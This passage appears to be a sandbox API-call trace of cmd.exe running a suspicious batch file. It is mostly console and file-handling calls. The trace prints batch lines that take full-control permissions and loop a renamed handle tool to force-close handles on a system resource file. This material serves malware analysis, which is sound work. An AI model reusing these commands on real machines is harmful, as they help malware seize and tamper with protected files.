lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f0fc*=0x15) returned 1 [0218.522] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f120 | out: _Buffer="\r\n") returned 2 [0218.522] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.522] GetFileType (hFile=0x3c) returned 0x2 [0218.522] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0218.522] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0f8 | out: lpMode=0x24f0f8) returned 1 [0218.522] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.522] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f110, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f110*=0x2) returned 1 [0218.523] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0218.523] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0218.523] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0218.523] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0218.523] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0218.523] _wcsicmp (_String1="set", _String2="CD") returned 16 [0218.523] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0218.523] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0218.523] _wcsicmp (_String1="set", _String2="REN") returned 1 [0218.523] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0218.523] _wcsicmp (_String1="set", _String2="SET") returned 0 [0218.523] GetConsoleTitleW (in: lpConsoleTitle=0x24ec90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.523] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0218.523] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0218.523] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0218.523] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0218.523] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0218.523] _wcsicmp (_String1="set", _String2="CD") returned 16 [0218.523] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0218.523] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0218.523] _wcsicmp (_String1="set", _String2="REN") returned 1 [0218.523] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0218.523] _wcsicmp (_String1="set", _String2="SET") returned 0 [0218.523] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0218.524] _wcsnicmp (_String1="FN", _String2="/A", _MaxCount=0x2) returned 55 [0218.524] _wcsnicmp (_String1="FN", _String2="/P", _MaxCount=0x2) returned 55 [0218.524] SetEnvironmentVariableW (lpName="FN", lpValue="\"jnwdui.dll.mui\"") returned 1 [0218.524] GetEnvironmentStringsW () returned 0x43b2e8* [0218.524] FreeEnvironmentStringsA (penv="=") returned 1 [0218.524] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.524] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0218.524] _get_osfhandle (_FileHandle=1) returned 0x3c [0218.524] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0218.524] _get_osfhandle (_FileHandle=0) returned 0x38 [0218.524] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0218.681] SetConsoleInputExeNameW () returned 0x1 [0218.681] GetConsoleOutputCP () returned 0x1b5 [0219.671] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0219.671] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.825] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f0dc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0219.826] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0219.826] _get_osfhandle (_FileHandle=3) returned 0xb0 [0219.826] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0219.826] _get_osfhandle (_FileHandle=3) returned 0xb0 [0219.826] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0219.826] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f0ac, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x24f0ac*=0xa3, lpOverlapped=0x0) returned 1 [0219.827] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0219.827] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0219.827] _get_osfhandle (_FileHandle=3) returned 0xb0 [0219.827] GetFileType (hFile=0xb0) returned 0x1 [0219.827] _get_osfhandle (_FileHandle=3) returned 0xb0 [0219.827] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0219.827] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x208, lpBuffer=0x24e828, lpFilePart=0x24e7ec | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x24e7ec*="vRnqNMBW.bat") returned 0x2a [0219.827] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24e530 | out: lpFindFileData=0x24e530) returned 0x430b68 [0219.828] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0219.828] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x24e530 | out: lpFindFileData=0x24e530) returned 0x430b68 [0219.828] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0219.828] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0219.828] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x24e530 | out: lpFindFileData=0x24e530) returned 0x430b68 [0219.828] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0219.828] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFindFileData=0x24e530 | out: lpFindFileData=0x24e530) returned 0x430b68 [0219.829] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0219.829] _wcsicmp (_String1="cd", _String2=")") returned 58 [0219.829] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0219.829] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0219.829] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0219.829] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0219.829] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0219.829] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0219.830] _tell (_FileHandle=3) returned 78 [0219.830] _close (_FileHandle=3) returned 0 [0219.830] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24ee70 | out: _Buffer="\r\n") returned 2 [0219.830] _get_osfhandle (_FileHandle=1) returned 0x3c [0219.830] GetFileType (hFile=0x3c) returned 0x2 [0219.830] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0219.830] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ee48 | out: lpMode=0x24ee48) returned 1 [0219.862] _get_osfhandle (_FileHandle=1) returned 0x3c [0219.862] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24ee60, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24ee60*=0x2) returned 1 [0219.953] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0219.953] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0219.953] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x24ee6c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0219.953] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x24ee6c | out: _Buffer=">") returned 1 [0219.953] _get_osfhandle (_FileHandle=1) returned 0x3c [0219.953] GetFileType (hFile=0x3c) returned 0x2 [0219.953] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0219.953] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ee4c | out: lpMode=0x24ee4c) returned 1 [0219.999] _get_osfhandle (_FileHandle=1) returned 0x3c [0219.999] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24ee64, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x24ee64*=0x1e) returned 1 [0220.377] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.377] GetFileType (hFile=0x3c) returned 0x2 [0220.377] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.377] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0ec | out: lpMode=0x24f0ec) returned 1 [0220.396] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.396] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x448400*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f104, lpReserved=0x0 | out: lpBuffer=0x448400*, lpNumberOfCharsWritten=0x24f104*=0x2) returned 1 [0220.409] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f10c | out: _Buffer=" /d \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\" ") returned 37 [0220.409] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.409] GetFileType (hFile=0x3c) returned 0x2 [0220.409] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.409] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0e4 | out: lpMode=0x24f0e4) returned 1 [0220.412] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.412] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x24f0fc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f0fc*=0x25) returned 1 [0220.412] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f120 | out: _Buffer="\r\n") returned 2 [0220.412] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.412] GetFileType (hFile=0x3c) returned 0x2 [0220.412] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.412] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0f8 | out: lpMode=0x24f0f8) returned 1 [0220.413] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.413] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f110, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f110*=0x2) returned 1 [0220.417] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0220.417] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0220.417] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0220.417] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0220.417] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0220.417] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0220.417] GetConsoleTitleW (in: lpConsoleTitle=0x24ec90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.420] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0220.420] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0220.420] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0220.420] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0220.420] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0220.420] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0220.420] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.420] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.420] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24ea48, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24ea40, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24ea40*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.420] _wcsnicmp (_String1="/d", _String2="/D", _MaxCount=0x2) returned 0 [0220.420] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24e7ec | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0220.420] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x104, lpBuffer=0x24e7ec, lpFilePart=0x24e7e4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0x24e7e4*=0x0) returned 0x1e [0220.421] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0220.421] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24e568 | out: lpFindFileData=0x24e568) returned 0x430b68 [0220.421] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0220.421] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x24e568 | out: lpFindFileData=0x24e568) returned 0x430b68 [0220.421] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0220.421] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0220.421] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x24e568 | out: lpFindFileData=0x24e568) returned 0x430b68 [0220.421] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0220.421] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0220.421] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0220.421] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0220.421] GetEnvironmentStringsW () returned 0x43cd40* [0220.421] FreeEnvironmentStringsA (penv="=") returned 1 [0220.421] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0220.422] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.422] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0220.463] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.463] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0220.471] _get_osfhandle (_FileHandle=0) returned 0x38 [0220.471] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0220.505] SetConsoleInputExeNameW () returned 0x1 [0220.505] GetConsoleOutputCP () returned 0x1b5 [0220.523] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0220.523] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.524] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f0dc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0220.524] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0220.524] _get_osfhandle (_FileHandle=3) returned 0xb0 [0220.524] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0220.524] _get_osfhandle (_FileHandle=3) returned 0xb0 [0220.524] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0220.524] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f0ac, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x24f0ac*=0x94, lpOverlapped=0x0) returned 1 [0220.524] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=148, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0220.524] _get_osfhandle (_FileHandle=3) returned 0xb0 [0220.524] GetFileType (hFile=0xb0) returned 0x1 [0220.524] _get_osfhandle (_FileHandle=3) returned 0xb0 [0220.524] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0220.525] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="\"jnwdui.dll.mui\"") returned 0x10 [0220.525] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0220.525] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0220.525] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0220.525] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0220.525] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0220.525] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0220.525] _wcsicmp (_String1="/L", _String2="%I") returned 10 [0220.525] _wcsicmp (_String1="/D", _String2="%I") returned 10 [0220.525] _wcsicmp (_String1="/F", _String2="%I") returned 10 [0220.525] _wcsicmp (_String1="/R", _String2="%I") returned 10 [0220.526] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0220.526] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0220.526] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0220.526] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0220.526] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0220.526] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0220.526] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0220.526] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0220.528] _tell (_FileHandle=3) returned 226 [0220.528] _close (_FileHandle=3) returned 0 [0220.528] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24ee70 | out: _Buffer="\r\n") returned 2 [0220.528] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.528] GetFileType (hFile=0x3c) returned 0x2 [0220.528] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.528] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ee48 | out: lpMode=0x24ee48) returned 1 [0220.546] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.546] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24ee60, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24ee60*=0x2) returned 1 [0220.553] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0220.553] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0220.553] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x24ee6c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0220.553] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x24ee6c | out: _Buffer=">") returned 1 [0220.553] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.553] GetFileType (hFile=0x3c) returned 0x2 [0220.553] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.553] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ee4c | out: lpMode=0x24ee4c) returned 1 [0220.553] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.553] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24ee64, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x24ee64*=0x1e) returned 1 [0220.554] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x24f10c | out: _Buffer="FOR") returned 3 [0220.554] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.554] GetFileType (hFile=0x3c) returned 0x2 [0220.555] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.555] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0e4 | out: lpMode=0x24f0e4) returned 1 [0220.563] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.563] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x24f0fc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f0fc*=0x3) returned 1 [0220.591] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x24f10c | out: _Buffer=" /F") returned 3 [0220.591] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.591] GetFileType (hFile=0x3c) returned 0x2 [0220.591] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.591] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0e4 | out: lpMode=0x24f0e4) returned 1 [0221.217] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.217] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x24f0fc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f0fc*=0x3) returned 1 [0221.224] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x24f10c | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0221.224] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.224] GetFileType (hFile=0x3c) returned 0x2 [0221.224] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.224] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0e4 | out: lpMode=0x24f0e4) returned 1 [0221.298] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.298] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x24f0fc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f0fc*=0x20) returned 1 [0221.311] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x24f10c | out: _Buffer=" %I IN ") returned 7 [0221.311] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.311] GetFileType (hFile=0x3c) returned 0x2 [0221.311] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.311] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0e4 | out: lpMode=0x24f0e4) returned 1 [0221.330] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.330] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x24f0fc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f0fc*=0x7) returned 1 [0221.337] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x24f108 | out: _Buffer="(`vIDhS3md.exe -accepteula \"jnwdui.dll.mui\" -nobanner`) DO ") returned 59 [0221.337] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.337] GetFileType (hFile=0x3c) returned 0x2 [0221.337] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.337] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0e0 | out: lpMode=0x24f0e0) returned 1 [0221.338] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.338] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3b, lpNumberOfCharsWritten=0x24f0f8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f0f8*=0x3b) returned 1 [0221.338] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.338] GetFileType (hFile=0x3c) returned 0x2 [0221.338] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.338] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0ec | out: lpMode=0x24f0ec) returned 1 [0221.339] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.339] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x24f104, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0x24f104*=0x1) returned 1 [0221.339] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.339] GetFileType (hFile=0x3c) returned 0x2 [0221.339] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.340] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0dc | out: lpMode=0x24f0dc) returned 1 [0221.340] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.340] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x430b70*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x24f0f4, lpReserved=0x0 | out: lpBuffer=0x430b70*, lpNumberOfCharsWritten=0x24f0f4*=0xc) returned 1 [0221.342] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f0fc | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0221.342] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.342] GetFileType (hFile=0x3c) returned 0x2 [0221.342] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0221.342] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0d4 | out: lpMode=0x24f0d4) returned 1 [0221.343] _get_osfhandle (_FileHandle=1) returned 0x3c [0221.343] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x24f0ec, lpReserved=0x0 | out: lpBuffer=0x1406940*, 